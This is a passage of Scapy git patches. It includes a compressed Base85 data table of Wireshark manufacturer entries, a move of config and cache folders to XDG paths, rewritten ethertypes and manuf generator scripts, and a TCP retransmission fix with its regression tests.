+U#Z&bPsR=#Iye%ZqCb9DyA7oRF=7pv#QC8!%ntEPs=^ItpxYOZPk$V^>zT(Bm{%W9yTQ6El{r(DPYa& +FinJ`DF~0CV!{LyUluwgoE|HJz(KecXS_)FI^6d=3|ypbmsM&7&`qE);vhLUERy;G&4R}_i`8auP-?F +T^_?qOdbG&wR$)oY3^xFP!sd2-(_*k8YLn^hWe)AWSkXAyg)w!1!8FLY)BcdlLf4B<=8ZUs^19WWEtGsu;_>jv=c6RSfKqBK#rb~hjYY`}Y;O^ +QSu{CLU;;Ao@~f&jkPxAeuLp23)Y>3Z4X+_nnI|qZqP!+ +6h6zo5$Qr@F6zz*SUWHV!P#k>=ZD4_nj*J}0uG`hnN6|99Dqsaqq$Dvm+v|URs&f)ZeK*mx`C5G_9YK +wU*=1Fg2FR1DW@RMdcZAlJNEs_X9i4`E)1ttq5F@xLB!gr9rQjT?r&_MPa-?^`uQNd?8^xSn;hE16Lz +j%X0zl4n}SPG1Kypk!&6qSx6cDPxx7!Zq>N>vj0U`BV}!xJM@ +CHSBilF4WoYsmhhR}0=nw``dVYO+NU><*jR7^zZ;(GSzS4Y_eq!x1=i*#~r!FRN08E+o)_40BT+J7>q$B9;-KNkYK(H|??D2{QNp +#()^)GgI6x=DBg>BVgQAVz^t=XFm*BJaB>;0r1ba^g1=BHNA)jf}*I3IqRU_+J_MX0w7?12#Tofyv2P?puGDv(JQq;I-?;c<+y{Td#2~=_-aZXAZHL;Mg=vAjS7Myd% +EP}HW;;a8{S(?~B0;X`g;aR&;Vv8FwGvK#sUd9CndeKK~Onq1`oV+bLAoF^(8CY5*{!=o2=0JZV-U%~ +`gSbefCO#oNn)d3}M+NiH$jMK%@$-@2oKo7N6?;`>>nVAtG{fZ$y^!T3yk&=fhqjv~0Mgr14W@ZYhw&Bp$Vu%o?;~t(qPMB|I&DWHb#;sSvqo60pQ#_GnSH>BV6(?U?U(sV +FkfWoR>mG0=-Q&^mFKe>pwH3 +Q|(nE=KdYSRU?XR@OK_z=a#Q5cuYkL%mM6t(%2x +b&=P06?qua-j990FFkmISUGF*rs7?fSvj&vGN_7sEN7KU(@V@WKLtQ^abb*-zt`@x2}me +6Y{&w79lG5e#9$jFDkI5iP*bWV73lFE&i+$Q7$!6Ko(DJ(TAkC*-Iu#yqK?4^B@WI9&bmR-Q(^xElWk +CC4r&QI<~`YHyhX>;nA8x0Rf1sp2(Q};ue&-xlY>=V2hq1<;+eo!A8OA&VQMpw(_#&uwoCwZWf@8!hx +uC014@Bj!ffdC#IRpqoS?_Zith7=q*!`+395qvjzng==`*Fb38TLd<}FxiIwFGsPpC=C$`Ie^K%2Pu?oXS)JUHvr +G#!KC*~#EQM_J&#bMnT8v}ZK1g(J%E12Qyo2Lm#%@qC`FIA9-($MRkq+5~~mysPJ561c60c_K)Xjw~` +!=^$YJg})@Q!<9c|jfVA5h^x*ITGy{{H#|6-BS2N1+-q=?&Jz6Ez~DO%9D(q2J7S-jXxm`yS^c}iQ^r +Q^-CwD^Z3$Esw_OM!=f`r}HyluN0J$4m@A5Q$O|u`d$)rwQr%1wa?qus#7>C@b(j#}$O=8^4aTDZUM%173E3D-^$B3dFdO`B)=REz)OMy{p0IKC(VCgSQV1Fo0; +c#YqS`SX+t_X9K-^Stf5$Ou$hTv+XHrv6{oiX?;hCeXn^stmtK1Ka3z6DH6Tu{_b`X{w7zR0%YY0376>-`y6HwPnz}O3J +IQKeCIaAgI6W*@WzBx`NKSRYSc*k61)ZVHl`@#T`OcJ{eAL%nV7VCf$&u`F`v<5ye3(>Dlwhh0G(W3I +-jnL`SgDQc03q{!tp5p +""") diff --git a/scapy/main.py b/scapy/main.py index e6e12c50e94..573bed8f538 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -65,13 +65,34 @@ ] -def _probe_config_file(*cf): - # type: (str) -> Union[str, None] - path = pathlib.Path(os.path.expanduser("~")) +def _probe_xdg_folder(var, default, *cf): + # type: (str, str, *str) -> Optional[pathlib.Path] + path = pathlib.Path(os.environ.get(var, default)) if not path.exists(): - # ~ folder doesn't exist. Unsalvageable - return None - return str(path.joinpath(*cf).resolve()) + # ~ folder doesn't exist. Create according to spec + # https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html + # "If, when attempting to write a file, the destination directory is + # non-existent an attempt should be made to create it with permission 0700." + path.mkdir(mode=0o700) + return path.joinpath(*cf).resolve() + + +def _probe_config_folder(*cf): + # type: (str) -> Optional[pathlib.Path] + return _probe_xdg_folder( + "XDG_CONFIG_HOME", + os.path.join(os.path.expanduser("~"), ".config"), + *cf + ) + + +def _probe_cache_folder(*cf): + # type: (str) -> Optional[pathlib.Path] + return _probe_xdg_folder( + "XDG_CACHE_HOME", + os.path.join(os.path.expanduser("~"), ".cache"), + *cf + ) def _read_config_file(cf, _globals=globals(), _locals=locals(), @@ -107,10 +128,15 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), if default is None: return # We have a default ! set it - cf_path.parent.mkdir(parents=True, exist_ok=True) - with cf_path.open("w") as fd: - fd.write(default) - log_loading.debug("Config file [%s] created with default.", cf) + try: + cf_path.parent.mkdir(parents=True, exist_ok=True) + with cf_path.open("w") as fd: + fd.write(default) + log_loading.debug("Config file [%s] created with default.", cf) + except OSError: + log_loading.warning("Config file [%s] could not be created.", cf, + exc_info=True) + return log_loading.debug("Loading config file [%s]", cf) try: with open(cf) as cfgf: @@ -135,6 +161,17 @@ def _validate_local(k): return k[0] != "_" and k not in ["range", "map"] +# This is ~/.config/scapy +SCAPY_CONFIG_FOLDER = _probe_config_folder("scapy") +SCAPY_CACHE_FOLDER = _probe_cache_folder("scapy") + +if SCAPY_CONFIG_FOLDER: + DEFAULT_PRESTART_FILE: Optional[str] = str(SCAPY_CONFIG_FOLDER / "prestart.py") + DEFAULT_STARTUP_FILE: Optional[str] = str(SCAPY_CONFIG_FOLDER / "startup.py") +else: + DEFAULT_PRESTART_FILE = None + DEFAULT_STARTUP_FILE = None + # Default scapy prestart.py config file DEFAULT_PRESTART = """ @@ -155,9 +192,6 @@ def _validate_local(k): # conf.use_pcap = True """.strip() -DEFAULT_PRESTART_FILE = _probe_config_file(".config", "scapy", "prestart.py") -DEFAULT_STARTUP_FILE = _probe_config_file(".config", "scapy", "startup.py") - def _usage(): # type: () -> None diff --git a/scapy/tools/generate_ethertypes.py b/scapy/tools/generate_ethertypes.py index 697e730b06d..92f6d1996df 100644 --- a/scapy/tools/generate_ethertypes.py +++ b/scapy/tools/generate_ethertypes.py @@ -11,16 +11,20 @@ but up-to-date. """ +import gzip import re import urllib.request +from base64 import b85encode +from scapy.error import log_loading + URL = "https://raw.githubusercontent.com/openbsd/src/master/sys/net/ethertypes.h" # noqa: E501 with urllib.request.urlopen(URL) as stream: DATA = stream.read() -reg = br".*ETHERTYPE_([^\s]+)\s.0x([0-9A-Fa-f]+).*\/\*(.*)\*\/" -COMPILED = b"""# +reg = r".*ETHERTYPE_([^\s]+)\s.0x([0-9A-Fa-f]+).*\/\*(.*)\*\/" +COMPILED = """# # Ethernet frame types # This file describes some of the various Ethernet # protocol types that are used on Ethernet networks. @@ -32,27 +36,33 @@ # ... #Comment # """ -ALIASES = { - b"IP": b"IPv4", - b"IPV6": b"IPv6" -} +ALIASES = {"IP": "IPv4", "IPV6": "IPv6"} for line in DATA.split(b"\n"): - match = re.match(reg, line) - if match: - name = match.group(1) - name = ALIASES.get(name, name).ljust(16) - number = match.group(2).upper() - comment = match.group(3).strip() - compiled_line = (b"%b%b" + b" " * 25 + b"# %b\n") % ( - name, number, comment + try: + match = re.match(reg, line.decode("utf8", errors="backslashreplace")) + if match: + name = match.group(1) + name = ALIASES.get(name, name).ljust(16) + number = match.group(2).upper() + comment = match.group(3).strip() + COMPILED += ("%s%s" + " " * 25 + "# %s\n") % (name, number, comment) + except Exception: + log_loading.warning( + "Couldn't parse one line from [%s] [%r]", URL, line, exc_info=True ) - COMPILED += compiled_line -with open("../libs/ethertypes.py", "rb") as inp: +# Compress properly +COMPILED = gzip.compress(COMPILED.encode()) +# Encode in Base85 +COMPILED = b85encode(COMPILED).decode() +# Split +COMPILED = "\n".join(COMPILED[i : i + 79] for i in range(0, len(COMPILED), 79)) + "\n" + +with open("../libs/ethertypes.py", "r") as inp: data = inp.read() -with open("../libs/ethertypes.py", "wb") as out: - ini, sep, _ = data.partition(b"DATA = b\"\"\"") - COMPILED = ini + sep + b"\n" + COMPILED + b"\"\"\"\n" +with open("../libs/ethertypes.py", "w") as out: + ini, sep, _ = data.partition("DATA = _d(\"\"\"") + COMPILED = ini + sep + "\n" + COMPILED + "\"\"\")\n" print("Written: %s" % out.write(COMPILED)) diff --git a/scapy/tools/generate_manuf.py b/scapy/tools/generate_manuf.py new file mode 100644 index 00000000000..6d16e1d339a --- /dev/null +++ b/scapy/tools/generate_manuf.py @@ -0,0 +1,43 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Generate the manuf.py file based on wireshark's manuf +""" + +import gzip +import urllib.request + +from base64 import b85encode + +URL = "https://www.wireshark.org/download/automated/data/manuf" + +with urllib.request.urlopen(URL) as stream: + DATA = stream.read() + +COMPILED = "" + +for line in DATA.split(b"\n"): + # We decode to strip any non-UTF8 characters. + line = line.strip().decode("utf8", errors="backslashreplace") + if not line or line.startswith("#"): + continue + COMPILED += line + "\n" + +# Compress properly +COMPILED = gzip.compress(COMPILED.encode()) +# Encode in Base85 +COMPILED = b85encode(COMPILED).decode() +# Split +COMPILED = "\n".join(COMPILED[i : i + 79] for i in range(0, len(COMPILED), 79)) + "\n" + + +with open("../libs/manuf.py", "r") as inp: + data = inp.read() + +with open("../libs/manuf.py", "w") as out: + ini, sep, _ = data.partition("DATA = _d(\"\"\"") + COMPILED = ini + sep + "\n" + COMPILED + "\"\"\")\n" + print("Written: %s" % out.write(COMPILED)) diff --git a/test/regression.uts b/test/regression.uts index befa870d14a..189f3f60de8 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1029,16 +1029,16 @@ with open(manuf2, "w") as w: a = load_manuf(manuf1) b = load_manuf(manuf2) -a.lookup("00:00:00") == ('JokyIsland', 'Joky Insland Corp SA'), -a.lookup("FF:00:11:00:00:00") == ('NoName', 'NoName') -a.reverse_lookup("Scapy") == {'EE:05:01': ('Scapy', 'Scapy CO LTD & CIE')} -a.reverse_lookup("Secdevcorp") == {'00:01:12': ('SecdevCorp', 'Secdev Corporation SA LLC')} +assert a.lookup("00:00:00") == ('JokyIsland', 'Joky Insland Corp SA') +assert a.lookup("FF:00:11:00:00:00") == ('NoName', 'NoName') +assert a.reverse_lookup("Scapy") == {'EE:05:01': ('Scapy', 'Scapy CO LTD & CIE')} +assert a.reverse_lookup("Secdevcorp") == {'00:01:12': ('SecdevCorp', 'Secdev Corporation SA LLC')} -b.lookup("00:00:00") == ('JokyIsland', 'Joky Insland Corp SA'), -b.lookup("FF:00:11:00:00:00") == ('NoName', 'NoName') -b.reverse_lookup("Scapy") == {'EE:05:01': ('Scapy', 'Scapy CO LTD & CIE')} -b.reverse_lookup("Secdevcorp") == {'00:01:12': ('SecdevCorp', 'Secdev Corporation SA LLC')} +assert b.lookup("00:00:00") == ('JokyIsland', 'Joky Insland Corp SA') +assert b.lookup("FF:00:11:00:00:00") == ('NoName', 'NoName') +assert b.reverse_lookup("Scapy") == {'EE:05:01': ('Scapy', 'Scapy CO LTD & CIE')} +assert b.reverse_lookup("Secdevcorp") == {'00:01:12': ('SecdevCorp', 'Secdev Corporation SA LLC')} scapy_delete_temp_files() @@ -1126,8 +1126,8 @@ conf.verb = saved_conf_verb = Test config file functions failures -from scapy.main import _read_config_file, _probe_config_file -assert _read_config_file(_probe_config_file("filethatdoesnotexistnorwillever.tsppajfsrdrr")) is None +from scapy.main import _read_config_file, _probe_config_folder +assert _read_config_file(_probe_config_folder("filethatdoesnotexistnorwillever.tsppajfsrdrr")) is None = Test CacheInstance repr diff --git a/test/run_tests b/test/run_tests index 48c931d9f2d..a44808dfc56 100755 --- a/test/run_tests +++ b/test/run_tests @@ -54,7 +54,7 @@ then fi # Run tox - export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K tshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" + export UT_FLAGS="-K tcpdump -K wireshark -K tshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" export SIMPLE_TESTS="true" export PYTHON export DISABLE_COVERAGE=" " diff --git a/tox.ini b/tox.ini index 4a987fa87f2..fd99680584d 100644 --- a/tox.ini +++ b/tox.ini @@ -46,8 +46,8 @@ platform = commands = linux-non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} linux-root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} - bsd-non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} - bsd-root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} + bsd-non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K tshark -N {posargs} + bsd-root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K tshark {posargs} windows: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} {env:DISABLE_COVERAGE:coverage combine} {env:DISABLE_COVERAGE:coverage xml -i} @@ -137,7 +137,7 @@ description = "Check code for Grammar mistakes" skip_install = true deps = codespell # inet6, dhcp6 and the ipynb files contains french: ignore them -commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*tcpros.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ +commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*manuf.py,*tcpros.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ [testenv:twine] @@ -189,6 +189,7 @@ per-file-ignores = scapy/layers/tls/crypto/all.py:F403 scapy/layers/tls/crypto/md4.py:E741 scapy/libs/winpcapy.py:F405,F403,E501 + scapy/libs/manuf.py:E501 scapy/tools/UTscapy.py:E501 exclude = scapy/libs/ethertypes.py, scapy/layers/msrpce/raw/* From 8bb5ba3b1cb6345723551f1c23575b967e957156 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 20 Jan 2024 15:13:00 +0100 Subject: [PATCH 1266/1632] Improve TCPSession retransmission handling - fixes #4197 - also fixes #4340: handling of HTTP reconstruction when gzip is involved --- scapy/layers/http.py | 5 ++++- scapy/sessions.py | 16 ++++++++++++---- test/scapy/layers/http.uts | 19 +++++++++++++++++++ test/scapy/layers/inet.uts | 19 +++++++++++++++---- 4 files changed, 50 insertions(+), 9 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index fd7b3f40500..3f8812f534f 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -271,6 +271,8 @@ def _dissect_headers(obj, s): class _HTTPContent(Packet): + __slots__ = ["_original_len"] + # https://developer.mozilla.org/fr/docs/Web/HTTP/Headers/Transfer-Encoding def _get_encodings(self): encodings = [] @@ -287,6 +289,7 @@ def hashret(self): return b"HTTP1" def post_dissect(self, s): + self._original_len = len(s) if not conf.contribs["http"]["auto_compression"]: return s encodings = self._get_encodings() @@ -626,7 +629,7 @@ def tcp_reassemble(cls, data, metadata, _): length = int(length) # Subtract the length of the "HTTP*" layer if http_packet.payload.payload or length == 0: - http_length = len(data) - len(http_packet.payload.payload) + http_length = len(data) - http_packet.payload._original_len detect_end = lambda dat: len(dat) - http_length >= length else: # The HTTP layer isn't fully received. diff --git a/scapy/sessions.py b/scapy/sessions.py index 46f271cc513..23e26de4f7d 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -306,25 +306,31 @@ def process(self, return pkt new_data = pay.original # Match packets by a unique TCP identifier - seq = pkt[TCP].seq ident = self._get_ident(pkt) data, metadata = self.tcp_frags[ident] tcp_session = self.tcp_sessions[self._get_ident(pkt, True)] + # Handle TCP sequence numbers + seq = pkt[TCP].seq + if "seq" not in metadata: + metadata["seq"] = seq + if "next_seq" in metadata and seq < metadata["next_seq"]: + # Retransmitted data (that we already returned) + new_data = new_data[metadata["next_seq"] - seq:] + if not new_data: + return None + seq = metadata["next_seq"] # Let's guess which class is going to be used if "pay_class" not in metadata: metadata["pay_class"] = pay_class = pkt[TCP].guess_payload_class(new_data) metadata["tcp_reassemble"] = tcp_reassemble = streamcls(pay_class) else: tcp_reassemble = metadata["tcp_reassemble"] - if "seq" not in metadata: - metadata["seq"] = seq # Get a relative sequence number for a storage purpose relative_seq = metadata.get("relative_seq", None) if relative_seq is None: relative_seq = metadata["relative_seq"] = seq - 1 seq = seq - relative_seq # Add the data to the buffer - # Note that this take care of retransmission packets. data.append(new_data, seq) # Check TCP FIN or TCP RESET if pkt[TCP].flags.F or pkt[TCP].flags.R: @@ -361,6 +367,8 @@ def process(self, # No padding (data) left. Clear data.clear() del self.tcp_frags[ident] + # Minimum next seq + metadata["next_seq"] = pkt[TCP].seq + len(new_data) # Rebuild resulting packet pay.underlayer.remove_payload() if IP in pkt: diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 8623e062751..c4ae211a831 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -117,6 +117,25 @@ pkts[2].show() assert HTTPResponse in pkts[2] assert pkts[2].load == b'' += HTTP decompression (gzip) with retransmission + +# pcap from GH4340 + +import io +import gzip + +pcap = gzip.decompress(bytes.fromhex("1f8b080062b92e6602ff9d586bace4e659f6d964d3e5244b93c08f003f3a52b2e96e9573d69799738e376cd8f15ced33f6dc3cbe0954c6f68cc733b6c739e3b9d840d956085445229590902284442fb4db42aab42ab4a04a5c052d95aa52d01209352090b854a8093fd24a9ba0f2bef69973dbed36b0dad1ccb1fd3ddf7b79dee77dfdfdfd5f7cfea3e7880789f5bfef7f9f2036e0fbb56463d8f8f94d8283dff8c96b370a073ff191773ff2d77ff5b90b44052ec4c10de2e643db1ffffd9ffcee537f7aebf5bff9ca9344ebe557aa9f42949be7eebc617f9420ce3d78fe0b1b0f3c706163e3c17388f8bee78f1133ac0c374324881bc4730f7dfb31444354a2f595275f5a7cf82d40bd75f3f13b6f149f4c115f4134407d172292079bc40ea0eddccbc6cbf134b5f1b3676cbc05a86fb71e3d773ef956e6e95bf126f16fe789f47316e5fcab71882897ffe707a16cfd2b41b49a5d3977f580d9d15a96193bc1b0336e1487d586392c6f87a3305797e5d6556a9bbab8599fcea26bb9e76776b2bdf0b767c97cdb9f0e2e6e162d6b10465b95c09ada6ee05ccb39891b3e93b30743af1fc1fdde6c70b0557406012c16a789eb79fdabf96d3277d99afa613f724d6ff06c4eecf2951c456e93cfe65437b0a7cb594e92733bdbd4b339f9c0b561f1d5c23679e5e266691a44f0d7961c87836bb97e187aae0520d3e0ea6a6bb95c6e0da707fed6fcc01ba03903fb7841631038d1e85a2e9f67a9f46a30b070ddb59ce54d6760e7c5cdb1cd30e4deee4e9f64acfcf0ba5169d04268ba6cd22f5e62caf0ffe980de2587ec80b4eddd7cdebcde3b781ac311c7f6ecfaa53c3958f4bdcbf06df667839dfcfbed019a70f9129d7f3f06f952817befaa6031e490b1f3145328e4df7ba950be72e512c33d3d2fecb014651776addd9d3dfa7ab2d0e9b6c3bb2cad6bfcc2666ca6418f48535dba4d5a19f76b7b0eef8f463a1d7946a9e2f2e5bc63f8ab9191449e4e8f167cb948e97265d92c77dc66395ada747bd750a5a919176971dc2625b5478ab2e01b631d7d3a6dd3f576cd9bf7153631b4f694f73ba1c570335df3868626c4262324bcbb74f871d1dd97a3a2452ba4c6744253558666cd8bfab0462c4d76851abb346a5edcea71a1e9c35a786ebf242cac9a32d7686104eb267d8d478cd0709d89c970f877c8d76713939618a34cc1dfc25c57296fbfd419f648a5ab4c94ae1a0b729b12845eb533ec4c3cb1d32b7072afe76add6c4f1d6c6c695c6ca8f610ed467b74bf9a18b24e6a7407a2c34e8caee3caf5906c56d8b05926ddfdeef268ff26c98dac40180d1476696bd214f6069babb1e52e33bb4aab64a049a93fe0b7676adc10fddc2f4dc2266d2c2c5f81ac38d3b52d7cad9af0a54e68d79468bfcbedf6557dca434c2c8a652cdf23755598813db037607527e18096166600f10c14afc990bb42bd13a571ec66180d975f34fc765ef77946572b243f8e8aa61aa1edd3f5b387311db56b4668d614c8db0872d849c0176010e4d3bd6b9f895dc378f32cda6fd6b9915d734ee215815567f728f6d542a8319267971c17e2e7991eebea9ae4e1fd94236e7ecebb9817696e630cc754d1aa0b9e41b189555b85b8ae41ad2cadbadad34a7b0b58b3b6238b25f0a22f93cb66dc095b75291cf8ca02b9a2d3051263bb2fcf26fdeeec605f3bb66fbde7f087dbe736e234df711613e7c4de02f0a77a80f11fcab35d2350e63a729cce3bb8def445cc2f6597bc5d881769034ff90a97624be3ced0500b6313b886dcb1b57688386730e07a07f8d59eee6bc0774621adba42b654d6d568dbb3ab2cac2f9080435ab103f6e075656ee0f59a327a07aaff7caafa6f9f56fd86b656fd97b709c2741179ad259d51b35671815d94984c9866973fd40bae78cae33a075e4fd65ae24ae5912b96f8393f162662592c001b599316a0f23a5045e09d1c9156e0018b8becdd55384a6c5548ec3ab0aacab6654aea41753f6f94c5442c3b8ce45796222d92862bd88d321f62b6ad843a8e724dc9a25c97283d9048cca04671ad1ed531f9a04749e3c94a54db94448b8c347662de236722301fd8e4998181fbb2ed1a2a518f96aa608f2a2d8c5a6f6a318a0bf6c7a9ea545859a9ce5c73cc33624d2f18323731ca1629d578509c65bc9faa4e9b4546997e35c24ad628a9daf30cf8ccdc1e2975bb0ad7d34843902b4ab3dda3aa6007da306e69c7761ba5e5b251ae842d9944565ea2abbc4b8df9ead21dc49d64a82c5d7e3c751bb4e8682501a229b15a89874ee0f927bd3f83120e480e3886de82e6781ca7541c96770b8171fa1ae85fde6dba2c6531fcc2acb1635d5d2e2cec7be329f0548a1bf40aba5175d638798d91dcbe9adf69304a62b9ece1efc36b69cf843a6228cfac4bdeffc90e52dc695036f40ca81d465c588c97a0ee8909bfdb4ea60b85f6e6460db4336665d0614da62c5a2a4765b05f837a875ab293b318bd638ce3f514b7b06925eed123cfac2d17f6b832174b7bbba976a810d75215b59d1c4046a10ee994115d6032f42fdb4fb5cc1bd4b95956e7c2deb0be0226ad604f057e83b6948ac7ebe4c887bee9e96ada4f907d501d3ce880e808751d7a1eea7571caab4a64d53b05788606663927e386381a60806e427fe94df960b53784ded2a79502ecbd97f56432ddd7469633143bec76a06f205f3816fbaace90c01983327d89ecabec9caf19a8513e6a10f4db13fef033de5d65fa897a04fa090c4fd25ea5b0be0dfa66d73ce81fa28b15803dcd50a9a55d9f804ab4c343bcac8f769d631ec49d494b85d8f9d58246c3fd9213d875e04ad79aa19ee38c61aad5e57ec986ea14481378873912e225703bf52906ce50969f9f1eeb69e1647ff3f7bbbadf87fe8c7c356b55d7848a166a7a28b8fa08fc1966fba09dfa2cb5558ed85331a90b941948e0cf6a66c124a5d333f469063d7c7cd8bf9d3335e788f8817c41dd41cfdb73f91274e734b6f63a7fc17eb7e80b9063c3077bc027cb67630dfc33620bf20ff9cb9e8f74d59b09f1243cb1172828eef50e54ff2055fdb74eab7ee7c25af5ffe821821861679b9838e1c5d07dd7d36d890f81392e6a34fee64b1596af189c5c95aa6809767dab540416a5130f4c65e4142bf3b05b91987dd075eca2881300b30388ecc9aae77b55568466cec2a4e40c622edf8c39b61917277a5cbc4473873bc42d575f610da6be6731f180470bcb63819b5690d6c5a9f839aede05be82ee419f75206f890116038f421378abf78a2b716c416de7978d7105ebc3cd66135853e2233dd07106855ae1528e422dae39e674fc2a70a0b70b75b4eed74eabcb150ddfc33a40fd029eb130db8026d4c569e6c364b75d57e68711c6996299cd63c5131db4386a75d10ef085e162e02599cd0ae91ee087e0d97525365dae67a5f319c51ecf19c608ed3c3b5358f89ba626fbc853a83f7cbe2517ff7fdd09fb4a167b9c7521bb6480dad7ae4bf0a280732acc605093b807c62e8db97ab406e65e09f47614db5d2bc4d90ce6e704d64dad006b519c093003e21431541588af02b119f9605b60a55abcc27af6f4385dbb8419796e9746c5d3f770ffc991aea4fa93d555de50c5ccd65afa3bdbafb677b4a7857a039349df6781f98e5b021ec0fdf05e7ea433a36b657a1614d9769d4bdf5f30c68d920dba34d9b5e951881a0333bd6fa8ac8f1a041c088ff25a81ebf0ae00731c62ccc471916c665a0671916626cca7876bee8e475d58e8149bee899a00fab9e4cba40376c4f02e32ccec4b73e1ac754dec16d996cbadb537b06aded2007de54b36031850273ce854fee879818177915a2fc0aab531e6dda52380b6433c987ecdc377137c8ff04c5a9fe27535a9da18df751ce11ed6016a6f6852b3154e4562b99dc7be30d4ec695f5d817f55a8996c76078d3545e0d8c9dc1a3ea808d64f8a9f4e7b4ba9eca439017c9879e15db47bb856217166f775a87da8cda335e9bb6816afa3e7ef15531d67eac379208d29bcefc17bd09ae7c89753bcc2ba3ae45ed287d9086b1a351f9f43653caacb520774a37d72bfe3e916fa07f488d57e175475dd1f2a1cd8097541b1de007a2bfacf4fa496dce553bed909353734cb59abfe973788f47356f5373e1bcf50f5b79e3aadfaea9752d57fe2dcf9fc3f12449b642560b406936edc87a9a671d8e190c142adc70a752b6af9471583f369622624cce82468738fe94c6406dfdfe1e9b48ef2b0425a34e44217bb491b90b27b9207efa91e5c97ed5aa70a33ce349dda21468d3139817c452d0fe7a00e073317be1d1c72c039ad2587fa855c17659e39d1f79d74ff32f4ec388d37d4a480bd3b3210c3cdbbc06fec26a0f4c7e8a0bca9d515562c4d70b60e1083ca7ca9c34c044adc4c2216660612dfdd3bda686c4094d27900e635e06a76aa5212403785560f666098afe71039881a70b7427916238d0ce063364f5493f53b1dc605f4d7c36fcce537878f107b04917eb22c46dffedace9fdcc8cefc6e7f0c4f117fec17ce9c22be8def6ead4737de9c5f270ecf3711e7f469e4099cfced8fa738c1bd706e020efd7582d8d838bf893c79f915fdb97780f88914d1bf1bb17301105fdf7aeade88f7f1f57753c4d5dd88fa73e0eb1ba39f3de9eb6f03f7f1731667e3c5db9f449cc71fbd27ce131b6fdefc2d82589f60e66892cc35f72f6e96fbd100cf22836772742127f60fe00e9dcf51cc359ab996a7733551beb8d91d1c2c0607d772c5b06f8d0657e9edfc7681ce5dee99f3209a5fb9b8a9f40f62b87bfaf0f3f8b8f1f471e8ddc790543e7fcf53c8d3e79bd160155d1d45bef76cce1af50f6683e87a4fae6eede169e57b5eb8909d7c3f70fecfbef5a31fca3d417c43bdf3d01fbcbd3dffe487b9bff32e2f7fe7a7be9afbe36f7ce017ef7cfda5f9c75efcf1e6ab8f7e977ef83bd75efccdeffdedaf7fe2d5c68d5bc27f773f4fccbff6a12b2ffcfbfcab46e195debbcd7f78fc8b9ff9af2fffc86bbf97ffc0affcf42fc7413ffac3e056d278f89b2f49d35ffa4fe537aa7ffe730f73af7df07bcf5cdebdfd6b7f49bcf4c17f79cf67e4e1e0574f24eb3e49ff549af4c5e964bd60a5c97a6ce3cde1ebc40fc43971dc7ef9f6ad1467fec371d8d123f73b648fd243f64f9f164ffd39c0b261647e70f8cf19ca9de0be28f314e5d63d511e03947fca50fee323f7f5e9d3a94fd1199f6c40fa192cfee177d0a7ff055f2af0bdf5180000")) + +pkts = sniff(offline=io.BytesIO(pcap), session=TCPSession) + +assert HTTPRequest in pkts[3] +assert pkts[3].Method == b"POST" +assert len(pkts[3].load) == 4491 + +assert HTTPResponse in pkts[8] +assert pkts[8].Http_Version == b'HTTP/1.1' +assert len(pkts[8].load) == 134 + = HTTP decompression (brotli) ~ brotli diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index acc3da96df0..f2579094584 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -518,7 +518,7 @@ with no_debug_dissector(reverse=True): IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=4)/"c", IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", ], session=TCPSession) - assert pkts[0][CustomPacket].a == b"abcd" + assert pkts[0][CustomPacket].a == b"abcd", "incremental failure" # same with a pcapng tmp_file = get_temp_file() wrpcap(tmp_file, [ @@ -528,7 +528,7 @@ with no_debug_dissector(reverse=True): IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", ]) pkts = sniff(offline=tmp_file, session=TCPSession) - assert pkts[0][CustomPacket].a == b"abcd" + assert pkts[0][CustomPacket].a == b"abcd", "pcapng failure" # messed up order: fragments 2 and 3 arrive in the wrong order pkts = sniff(offline=[ IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x05a", @@ -536,7 +536,7 @@ with no_debug_dissector(reverse=True): IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=3)/"b", IP(dst="1.1.1.1", 